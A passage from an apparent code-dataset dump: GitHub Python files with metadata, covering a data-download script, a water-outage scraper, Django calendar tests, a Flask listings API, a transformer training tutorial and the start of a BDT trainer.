"usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 239, "usage_type": "call"}, {"api_name": "apps.communication.forms.NewCommentForm", "line_number": 241, "usage_type": "call"}, {"api_name": "forms.AddToCartForm", "line_number": 242, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 247, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 253, "usage_type": "call"}, {"api_name": "apps.cart.cart.Cart", "line_number": 260, "usage_type": "call"}, {"api_name": "models.Product.objects.get_object_or_404get", "line_number": 266, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 266, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 266, "usage_type": "name"}, {"api_name": "models.ProductSpecificationValue.objects.filter", "line_number": 272, "usage_type": "call"}, {"api_name": "models.ProductSpecificationValue.objects", "line_number": 272, "usage_type": 
"attribute"}, {"api_name": "models.ProductSpecificationValue", "line_number": 272, "usage_type": "name"}, {"api_name": "models.Comments.objects.create", "line_number": 276, "usage_type": "call"}, {"api_name": "models.Comments.objects", "line_number": 276, "usage_type": "attribute"}, {"api_name": "models.Comments", "line_number": 276, "usage_type": "name"}, {"api_name": "models.Comments.objects.create", "line_number": 282, "usage_type": "call"}, {"api_name": "models.Comments.objects", "line_number": 282, "usage_type": "attribute"}, {"api_name": "models.Comments", "line_number": 282, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 287, "usage_type": "call"}, {"api_name": "django.core.paginator.Paginator", "line_number": 293, "usage_type": "call"}, {"api_name": "django.core.paginator.PageNotAnInteger", "line_number": 296, "usage_type": "name"}, {"api_name": "django.core.paginator.EmptyPage", "line_number": 298, "usage_type": "name"}, {"api_name": "random.sample", "line_number": 309, "usage_type": "call"}, {"api_name": "apps.communication.forms.NewCommentForm", "line_number": 317, "usage_type": "call"}, {"api_name": "forms.AddToCartForm", "line_number": 318, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 320, "usage_type": "call"}, {"api_name": "apps.cart.cart.Cart", "line_number": 329, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 335, "usage_type": "call"}, {"api_name": "models.Product", "line_number": 335, "usage_type": "argument"}, {"api_name": "django.contrib.messages.success", "line_number": 337, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 337, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 338, "usage_type": "call"}, {"api_name": "forms.AddCategoryForm", "line_number": 346, "usage_type": "call"}, {"api_name": "models.Category.objects.create", "line_number": 351, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 351, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 351, "usage_type": "name"}, {"api_name": "forms.AddCategoryForm", "line_number": 353, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 354, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 356, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 342, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 359, "usage_type": "call"}, {"api_name": "models.Category", "line_number": 359, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 360, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 365, "usage_type": "call"}, {"api_name": "models.Category", "line_number": 365, "usage_type": "argument"}, {"api_name": "models.Product.objects.filter", "line_number": 366, "usage_type": "call"}, {"api_name": "models.Product", "line_number": 367, "usage_type": "argument"}, {"api_name": "models.Product.objects", "line_number": 366, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 366, "usage_type": "name"}, {"api_name": "models.Category.objects.get", "line_number": 367, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 367, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 367, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", 
"line_number": 369, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 375, "usage_type": "call"}, {"api_name": "models.Product", "line_number": 375, "usage_type": "argument"}, {"api_name": "django.http.JsonResponse", "line_number": 385, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 372, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 392, "usage_type": "call"}, {"api_name": "models.Product", "line_number": 392, "usage_type": "argument"}, {"api_name": "django.contrib.messages.success", "line_number": 396, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 396, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 397, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 388, "usage_type": "name"}, {"api_name": "apps.vendor.forms.ProductForm", "line_number": 404, "usage_type": "call"}, {"api_name": "django.utils.text.slugify", "line_number": 411, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 413, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 417, "usage_type": "call"}, {"api_name": "apps.vendor.forms.ProductForm", "line_number": 419, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 420, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 400, "usage_type": "name"}, {"api_name": "forms.AddCategoryForm", "line_number": 426, "usage_type": "call"}, {"api_name": "models.Category.objects.create", "line_number": 431, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 431, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 431, "usage_type": "name"}, {"api_name": "forms.AddCategoryForm", "line_number": 433, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 434, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 436, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 422, "usage_type": "name"}]} +{"seq_id": "73946671847", "text": "import argparse\nimport pathlib\nimport shutil\nimport urllib.request\nimport tarfile\nimport tempfile\nimport time\n\nglobal start_time\n\n\ndef progress(count, block_size, total_size):\n global start_time\n if count == 0:\n start_time = time.time()\n return\n duration = time.time() - start_time\n progress_size = int(count * block_size)\n speed = int(progress_size / (1024 * duration))\n percent = int(count * block_size * 100 / total_size)\n print(\"%d%%, %d MB, %d KB/s, total time: %d seconds\" % (percent, progress_size / (1024 * 1024), speed, duration), end=\"\\r\")\n\n\ndef unpack(tarname: pathlib.Path, destination: pathlib.Path):\n # recursive function to unpack all tar.gz files in a directory\n print(\"unpacking \", tarname, destination)\n if tarname.suffixes != [\".tar\", \".gz\"]:\n # stop if this is not a compressed directory\n return\n tar = tarfile.open(tarname, \"r:gz\")\n tar.extractall(path=destination)\n tar.close()\n\n # for each file in destination: call unpack again\n outdir = destination / tarname.name.replace(\".tar.gz\", \"\")\n\n for file in outdir.iterdir():\n unpack(file, outdir)\n\n\ndef move_and_unpack_data(tmpdir: pathlib.Path, src_dir: str, filename: str, unpack_data: bool):\n data_src = tmpdir / src_dir / filename\n data_dst = 
pathlib.Path(\".\")\n shutil.copy(data_src, data_dst)\n\n if unpack_data:\n unpack(data_dst / filename, data_dst.parent)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--unpack\",\n help=\"If set, unpack all compressed subdirectories as well. This will require approx. 30 GB of disk space.\",\n action=\"store_true\"\n )\n\n unpack_data = parser.parse_args().unpack\n download_path = \"https://cme.h-its.org/exelixis/material/simulation_study.tar.gz\"\n\n with tempfile.TemporaryDirectory() as tmpdir:\n print(\"Downloading data from \", download_path)\n filename, _ = urllib.request.urlretrieve(url=download_path, reporthook=progress)\n\n print(\"\\nUnpacking data\")\n tar = tarfile.open(filename, \"r:gz\")\n tar.extractall(path=tmpdir)\n tar.close()\n\n tmpdir = pathlib.Path(tmpdir)\n move_and_unpack_data(tmpdir=tmpdir, src_dir=\"supplementary_data\", filename=\"input_data.tar.gz\", unpack_data=unpack_data)\n move_and_unpack_data(tmpdir=tmpdir, src_dir=\"supplementary_data/GBT\", filename=\"dataframes.tar.gz\", unpack_data=unpack_data)\n move_and_unpack_data(tmpdir=tmpdir, src_dir=\"supplementary_data/GBT\", filename=\"training_results.tar.gz\", unpack_data=unpack_data)\n", "repo_name": "tschuelia/SimulationStudy", "sub_path": "download_data.py", "file_name": "download_data.py", "file_ext": "py", "file_size_in_byte": 2600, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "time.time", "line_number": 15, "usage_type": "call"}, {"api_name": "time.time", "line_number": 17, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "tarfile.open", "line_number": 30, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 43, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 44, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 51, "usage_type": "call"}, {"api_name": "tempfile.TemporaryDirectory", "line_number": 61, "usage_type": "call"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 63, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 63, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 63, "usage_type": "name"}, {"api_name": "tarfile.open", "line_number": 66, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 70, "usage_type": "call"}]} +{"seq_id": "5948266579", "text": "from datetime import datetime\nfrom urllib.parse import urljoin\nfrom app.scrapers.base import AbstractProvider\n\n\n# TODO: unify scrapping and parsing\n\nclass GWP(AbstractProvider):\n \"\"\"GWP water provider class\"\"\"\n\n TYPE = 'water'\n ROOT_URL = 'https://www.gwp.ge'\n URLS = [\n {\"url\": urljoin(ROOT_URL, '/ka/dagegmili'), \"emergency\": False},\n {\"url\": urljoin(ROOT_URL, '/ka/gadaudebeli'), \"emergency\": True}\n ]\n\n async def scrap_notifications(self) -> list:\n \"\"\"Scraps notifications based on their type from webpage\"\"\"\n\n notifications = []\n\n for item in self.URLS:\n url = item.get(\"url\")\n emergency = item.get(\"emergency\")\n soup = await self.request_soup(url)\n outages_table = soup.find(\"table\", {\"class\": \"samushaoebi\"})\n outages_blocks = outages_table.find_all('tr')\n\n for item in outages_blocks:\n date = datetime.strptime(item.find(\"span\", {\"style\": \"color:#f00000\"}).text, 
\"%d/%m/%Y\")\n\n if date >= datetime.now().replace(hour=0, minute=0, second=0, microsecond=0):\n title = item.find_all(\"a\")[1].get_text(strip=True)\n link = urljoin(self.ROOT_URL, item.a.get(\"href\"))\n notifications.append(\n {\n \"type\": self.TYPE,\n \"date\": date.strftime(\"%Y-%m-%d\"),\n \"title\": title,\n \"emergency\": emergency,\n \"link\": link,\n }\n )\n\n return notifications\n\n async def parse_notifications_info(self, notifications: list) -> list: # noqa: C901\n \"\"\"Parses info from notifications\"\"\"\n\n notifications_info = []\n\n for notification in notifications:\n\n url = notification.get('link')\n soup = await self.request_soup(url)\n\n type = notification.get(\"type\")\n date = notification.get('date')\n title = notification.get('title')\n\n emergency = notification.get(\"emergency\")\n\n # For emergency outages\n\n if emergency:\n outage_text = soup.css.select(\".initial > ul > li > p\")\n for i in outage_text:\n if i.get_text(strip=True) != '':\n info = i.get_text(strip=True).replace(\"\\xa0\", \" \")\n notifications_info.append(\n {\n 'date': date,\n 'type': type,\n 'emergency': emergency,\n 'title': title,\n 'info': info\n }\n )\n # For planned outages\n\n else:\n outage_text = soup.css.select(\".news-details > p\")\n temp = []\n for i in outage_text:\n if i.get_text(strip=True) != '':\n temp.append(i.get_text(strip=True).replace(\"\\xa0\", \" \"))\n\n info = \"\".join(temp[1:-2])\n notifications_info.append(\n {\n 'date': date,\n 'type': type,\n 'emergency': emergency,\n 'title': title,\n 'info': info\n }\n )\n\n return notifications_info\n", "repo_name": "roaddust2/outages-ge-bot", "sub_path": "app/scrapers/gwp.py", "file_name": "gwp.py", "file_ext": "py", "file_size_in_byte": 3524, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "app.scrapers.base.AbstractProvider", "line_number": 8, "usage_type": "name"}, {"api_name": "urllib.parse.urljoin", "line_number": 14, "usage_type": "call"}, {"api_name": "urllib.parse.urljoin", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 31, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 31, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 33, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 33, "usage_type": "name"}, {"api_name": "urllib.parse.urljoin", "line_number": 35, "usage_type": "call"}]} +{"seq_id": "14196435929", "text": "from django.test import TestCase\nfrom django.utils import timezone\nfrom util.factories import CalendarFactory, EventFactory\n\n\nclass CalendarTestCase(TestCase):\n\n def setUp(self):\n self.calendar = CalendarFactory()\n self.profile = self.calendar.owner\n\n def test_default(self):\n # Ensure default calendar exists when user profile is created\n self.assertIsNotNone(self.calendar)\n\n # Test the default values of the calendar are correct\n self.assertEqual(self.calendar.owner, self.profile)\n self.assertEqual(self.calendar.privacy, 0)\n self.assertEqual(str(self.calendar),\n str(self.profile) + ' -> ' + self.calendar.title)\n\n def test_create(self):\n # Valid data for calendar creation\n data = {\n 'owner': self.profile,\n 'title': 'Personal',\n 'color': '#420BAE',\n 'privacy': 420\n }\n\n # Create the calendar with the given data\n calendar = CalendarFactory(\n owner=data['owner'],\n title=data['title'],\n color=data['color'],\n privacy=data['privacy']\n )\n\n # Try accessing all the 
fields, ensure they're correct\n for field in data:\n self.assertEqual(data[field], getattr(calendar, field))\n\n\nclass EventTestCase(TestCase):\n\n def setUp(self):\n self.calendar = CalendarFactory()\n self.profile = self.calendar.owner\n\n def test_create(self):\n # Valid data for an event\n data = {\n 'calendar': self.calendar,\n 'title': \"JoJo's Bizarre Adventure\",\n 'start': timezone.now(),\n 'end': timezone.now() + timezone.timedelta(hours=5),\n 'location': 'Great Britain',\n 'description': \"JoJo's Bizarre Adventure tells the story of \"\n \"the Joestar family, a family whose various members \"\n \"discover they are destined to take down supernatural \"\n \"foes using unique powers that they find they possess.\"\n }\n\n # Create the event\n event = EventFactory(\n calendar=data['calendar'],\n title=data['title'],\n start=data['start'],\n end=data['end'],\n location=data['location'],\n description=data['description'],\n )\n\n # Try accessing all the fields, ensure they're correct\n for field in data:\n self.assertEqual(data[field], getattr(event, field))\n\n # Serialize the event\n serialized_data = event.serialize()\n\n # Ensure serialized data is correct\n for field in data:\n # Start and end times should be formatted\n if field == 'start':\n self.assertEqual(event.start.strftime('%Y-%m-%dT%H:%M:%S'),\n serialized_data[field])\n elif field == 'end':\n self.assertEqual(event.end.strftime('%Y-%m-%dT%H:%M:%S'),\n serialized_data[field])\n elif field == 'calendar':\n pass\n else:\n self.assertEqual(getattr(event, field), serialized_data[field])\n\n # Test unicode representation\n self.assertEqual(\n \"%s -> %s : %s -> %s\" % (event.calendar, event.title, event.start, event.end,),\n unicode(event)\n )\n\n def test_interval(self):\n event = EventFactory()\n interval = event.as_interval\n self.assertEqual(event.start, interval.start)\n self.assertEqual(event.end, interval.end)\n\n def test_happens_when(self):\n now = timezone.now()\n onehr = timezone.timedelta(hours=1)\n\n # Test in range\n inrange = EventFactory(\n start=now - onehr,\n end=now + onehr,\n )\n self.assertTrue(inrange.happens_when(now))\n\n # Test before\n before = EventFactory(\n start=now - 2 * onehr,\n end=now - onehr,\n )\n self.assertFalse(before.happens_when(now))\n\n # Test edge before\n before = EventFactory(\n start=now - onehr,\n end=now,\n )\n self.assertFalse(before.happens_when(now))\n\n # Test after\n before = EventFactory(\n start=now + onehr,\n end=now + 2 * onehr,\n )\n self.assertFalse(before.happens_when(now))\n\n # Test edge after\n before = EventFactory(\n start=now,\n end=now + onehr,\n )\n self.assertFalse(before.happens_when(now))\n", "repo_name": "sudo-woodo/hitmeup", "sub_path": "ourcalendar/tests/test_models.py", "file_name": "test_models.py", "file_ext": "py", "file_size_in_byte": 4612, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.test.TestCase", "line_number": 6, "usage_type": "name"}, {"api_name": "util.factories.CalendarFactory", "line_number": 9, "usage_type": "call"}, {"api_name": "util.factories.CalendarFactory", "line_number": 32, "usage_type": "call"}, {"api_name": "django.test.TestCase", "line_number": 44, "usage_type": "name"}, {"api_name": "util.factories.CalendarFactory", "line_number": 47, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 55, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 55, "usage_type": "name"}, {"api_name": 
"django.utils.timezone.now", "line_number": 56, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 56, "usage_type": "name"}, {"api_name": "django.utils.timezone.timedelta", "line_number": 56, "usage_type": "call"}, {"api_name": "util.factories.EventFactory", "line_number": 65, "usage_type": "call"}, {"api_name": "util.factories.EventFactory", "line_number": 102, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 108, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 108, "usage_type": "name"}, {"api_name": "django.utils.timezone.timedelta", "line_number": 109, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 109, "usage_type": "name"}, {"api_name": "util.factories.EventFactory", "line_number": 112, "usage_type": "call"}, {"api_name": "util.factories.EventFactory", "line_number": 119, "usage_type": "call"}, {"api_name": "util.factories.EventFactory", "line_number": 126, "usage_type": "call"}, {"api_name": "util.factories.EventFactory", "line_number": 133, "usage_type": "call"}, {"api_name": "util.factories.EventFactory", "line_number": 140, "usage_type": "call"}]} +{"seq_id": "36953897908", "text": "import os\nimport dumper\nfrom flask import Flask, jsonify, request\nfrom flask.ext.sqlalchemy import SQLAlchemy\nfrom geojson import Feature, Point, FeatureCollection\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = os.environ['DATABASE_URL']\ndb = SQLAlchemy(app)\ndb.reflect()\n\nclass Listing(db.Model):\n __tablename__ = 'listings'\n\nfeat_props= (\"id\", \"price\", \"street\", \"status\", \"bedrooms\", \"bathrooms\", \"sq_ft\")\n\n@app.route('/')\ndef hello():\n return \"Hello World!\"\n\n@app.route('/listings')\ndef listings():\n l_query= Listing.query\n min_price= request.args.get('min_price', type=int)\n if min_price is not None:\n l_query= l_query.filter(Listing.price >= min_price)\n max_price= request.args.get('max_price', type=int)\n if max_price is not None:\n l_query= l_query.filter(Listing.price <= max_price)\n\n min_bed= request.args.get('min_bed', type=int)\n if min_bed is not None:\n l_query= l_query.filter(Listing.bedrooms >= min_bed)\n max_bed= request.args.get('max_bed', type=int)\n if max_bed is not None:\n l_query= l_query.filter(Listing.bedrooms <= max_bed)\n\n min_bath= request.args.get('min_bath', type=int)\n if min_bath is not None:\n l_query= l_query.filter(Listing.bathrooms >= min_bath)\n max_bath= request.args.get('max_bath', type=int)\n if max_bath is not None:\n l_query= l_query.filter(Listing.bathrooms <= max_bath)\n\n features= list()\n for entry in l_query.all():\n feature = Feature(geometry=Point((entry.long, entry.lat)))\n feature.properties= {k:getattr(entry, k) for k in feat_props}\n features.append(feature)\n \n retcode= jsonify(FeatureCollection(features))\n return(retcode)\n\nif __name__ == '__main__':\n app.run()\n", "repo_name": "leed25d/od_listings", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1759, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 7, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 8, "usage_type": "attribute"}, {"api_name": "flask.ext.sqlalchemy.SQLAlchemy", "line_number": 9, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 24, "usage_type": 
"attribute"}, {"api_name": "flask.request", "line_number": 24, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 27, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 27, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 27, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 31, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 31, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 31, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 34, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 34, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 38, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 38, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 38, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 41, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 41, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 41, "usage_type": "name"}, {"api_name": "geojson.Feature", "line_number": 47, "usage_type": "call"}, {"api_name": "geojson.Point", "line_number": 47, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 51, "usage_type": "call"}, {"api_name": "geojson.FeatureCollection", "line_number": 51, "usage_type": "call"}]} +{"seq_id": "74773847527", "text": "# See [video](https://youtu.be/kCc8FmEb1nY)\n# The colab repo is [here](https://colab.research.google.com/drive/1JMLa53HDuA-i7ZBmqV7ZnA3c_fvtXnx-?usp=sharing)\n\nimport time\nfrom pathlib import Path\n\nimport torch\nfrom torch.utils.data import DataLoader \nfrom tqdm import tqdm\n\nfrom config import get_config, get_device, get_model_folder\nfrom dataset8 import get_ds8, get_testing_ds8, Dataset8\nfrom model8 import Transformer8, build_transformer8\nfrom utils import reload_model, save_model, load_trained_model\n\n\ndef build_model8(config: dict, vocab_tgt_len: int) -> Transformer8:\n model = build_transformer8(vocab_tgt_len,\n d_model=config['d_model'], N=config['N'], h=config['h'], block_size=config['block_size'], dropout=config['dropout'], d_ff=config['d_ff'])\n return model\n\n\ndef train_model8(config: dict):\n # hyperparameters\n max_iters = 5000\n eval_interval = 100\n eval_iters = 200\n total_loss = 0\n initial_epoch = 0\n global_step = 0\n\n torch.manual_seed(1337)\n\n device = get_device()\n\n model_folder = get_model_folder(config)\n Path(model_folder).mkdir(parents=True, exist_ok=True)\n\n train_dataloader, val_dataloader, tokenizer_tgt, train_ds, val_ds = get_ds8(config, model_folder)\n transformer = build_model8(config, tokenizer_tgt.get_vocab_size()).to(device)\n\n # print the number of parameters in the model\n print(sum(p.numel() for p in transformer.parameters())/1e6, 'M parameters')\n\n # create a PyTorch optimizer\n optimizer = torch.optim.AdamW(transformer.parameters(), lr=config['lr'])\n\n transformer, initial_epoch, optimizer, global_step = reload_model(\n config, transformer, optimizer, initial_epoch, global_step)\n\n for epoch in range(initial_epoch, config['num_epochs']):\n if (device == 'cuda'):\n torch.cuda.empty_cache()\n\n transformer.train() # moved inside for run_validation at each step\n\n batch_iterator = tqdm(train_dataloader, desc=f'Processing epoch {epoch:02d}')\n # for iter, batch 
in enumerate(batch_iterator):\n # if (iter == max_iters):\n # break\n for iter in range(max_iters):\n\n # every once in a while evaluate the loss on train and val sets\n if (iter % eval_interval == 0 or iter == max_iters - 1) and (iter > 0):\n losses = evaluate_model8(transformer, val_dataloader, eval_iters, device, train_ds, val_ds)\n batch_iterator.write(f\"step {iter}: train loss {losses['train']:.4f}, val loss {losses['val']:.4f}\")\n\n # sample a batch of data\n # xb, yb = batch\n xb, yb = train_ds.get_batch()\n\n # evaluate the loss\n logits, loss = transformer(xb.to(device), yb.to(device))\n optimizer.zero_grad(set_to_none=True)\n loss.backward()\n optimizer.step()\n\n # Save the model at the end of every epoch\n save_model(config, transformer, optimizer, epoch, global_step)\n\n\n # generate from the model\n context = torch.zeros((1, 1), dtype=torch.long, device=device)\n print(tokenizer_tgt.decode(transformer.generate(context, max_new_tokens=2000)[0].tolist()))\n\n\n@torch.no_grad()\ndef evaluate_model8(transformer: Transformer8, val_dataloader: DataLoader, eval_iters: int, device, train_ds: Dataset8, val_ds: Dataset8):\n\n out = {'train':0, 'val': 0}\n transformer.eval()\n\n tmp = {'train':train_ds, 'val': val_ds}\n for key, value in tmp.items():\n losses = torch.zeros(eval_iters)\n for k in range(eval_iters):\n X, Y = value.get_batch()\n logits, loss = transformer(X.to(device), Y.to(device))\n losses[k] = loss.item()\n out[key] = losses.mean()\n\n # losses = torch.zeros(eval_iters)\n # for k, batch in enumerate(val_dataloader):\n # if k == eval_iters:\n # break\n # X, Y = batch\n # logits, loss = transformer(X.to(device), Y.to(device))\n # losses[k] = loss.item()\n # out['val'] = losses.mean()\n\n transformer.train()\n return out\n\ndef translate8(config: dict, sentence: str):\n device = get_device()\n\n model_folder = get_model_folder(config)\n if not Path.exists(Path(model_folder)):\n raise ValueError(f\"{model_folder} model_folder does not exist\")\n\n tokenizer = get_testing_ds8(config, model_folder)\n model = build_model8(config, tokenizer.get_vocab_size()).to(device)\n\n # Load the pretrained weights\n model = load_trained_model(config, model)\n\n # generate from the model\n context = torch.zeros((1, 1), dtype=torch.long, device=device)\n print(tokenizer.decode(model.generate(context, max_new_tokens=2000)[0].tolist()))\n\ndef debug_code_model8(config: dict, device):\n config['model'] = \"model7\"\n config['datasource'] = \"translate\"\n config['lang_src'] = \"en\"\n config['lang_tgt'] = \"fr\"\n\n model_folder = get_model_folder(config)\n Path(model_folder).mkdir(parents=True, exist_ok=True)\n\n train_dataloader, val_dataloader, test_dataloader, tokenizer_tgt, train_ds, val_ds = get_ds8(config, model_folder)\n model = build_model8(config, tokenizer_tgt.get_vocab_size()).to(device)\n\n print(model)\n model.train()\n\n\nif __name__ == '__main__':\n # warnings.filterwarnings('ignore')\n config = get_config()\n device = get_device()\n debug_code_model8(config, device)\n", "repo_name": "prorates/pytorch-transformer-tutorials", "sub_path": "tutorial8.py", "file_name": "tutorial8.py", "file_ext": "py", "file_size_in_byte": 5361, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "model8.build_transformer8", "line_number": 18, "usage_type": "call"}, {"api_name": "model8.Transformer8", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.manual_seed", "line_number": 32, "usage_type": "call"}, 
{"api_name": "config.get_device", "line_number": 34, "usage_type": "call"}, {"api_name": "config.get_model_folder", "line_number": 36, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 37, "usage_type": "call"}, {"api_name": "dataset8.get_ds8", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.optim.AdamW", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 46, "usage_type": "attribute"}, {"api_name": "utils.reload_model", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.cuda.empty_cache", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 53, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 57, "usage_type": "call"}, {"api_name": "utils.save_model", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 83, "usage_type": "attribute"}, {"api_name": "model8.Transformer8", "line_number": 88, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 88, "usage_type": "name"}, {"api_name": "dataset8.Dataset8", "line_number": 88, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 87, "usage_type": "call"}, {"api_name": "config.get_device", "line_number": 115, "usage_type": "call"}, {"api_name": "config.get_model_folder", "line_number": 117, "usage_type": "call"}, {"api_name": "pathlib.Path.exists", "line_number": 118, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 118, "usage_type": "name"}, {"api_name": "dataset8.get_testing_ds8", "line_number": 121, "usage_type": "call"}, {"api_name": "utils.load_trained_model", "line_number": 125, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 128, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 128, "usage_type": "attribute"}, {"api_name": "config.get_model_folder", "line_number": 137, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 138, "usage_type": "call"}, {"api_name": "dataset8.get_ds8", "line_number": 140, "usage_type": "call"}, {"api_name": "config.get_config", "line_number": 149, "usage_type": "call"}, {"api_name": "config.get_device", "line_number": 150, "usage_type": "call"}]} +{"seq_id": "20276449246", "text": "import pickle\n\nfrom sklearn.ensemble import AdaBoostClassifier\n\nimport ROOT\nimport PyAnalysisTools.PlottingUtils.PlottingTools as PT\nimport PyAnalysisTools.PlottingUtils.Formatting as FT\nimport PyAnalysisTools.PlottingUtils.Formatting as FM\nfrom PyAnalysisTools.AnalysisTools.MLHelper import TrainingReader, MLTrainConfig\nfrom PyAnalysisTools.base import InvalidInputError\nfrom PyAnalysisTools.base.OutputHandle import OutputFileHandle\nfrom PyAnalysisTools.base.FileHandle import FileHandle\nfrom PyAnalysisTools.PlottingUtils.PlotConfig import PlotConfig as pc\nfrom PyAnalysisTools.AnalysisTools.StatisticsTools import get_KS\nfrom PyAnalysisTools.base.ShellUtils import copy\nfrom PyAnalysisTools.base.YAMLHandle import YAMLLoader as yl\n\n\nclass BDTConfig(object):\n def __init__(self, **kwargs):\n kwargs.setdefault('num_layers', 4)\n for k, v in kwargs.items():\n setattr(self, k.lower(), v)\n\n\nclass SklearnBDTTrainer(object):\n def __init__(self, **kwargs):\n kwargs.setdefault('output_path', './')\n self.train_cfg = MLTrainConfig(**yl.read_yaml(kwargs['training_config_file']))\n self.bdt_cfg = 
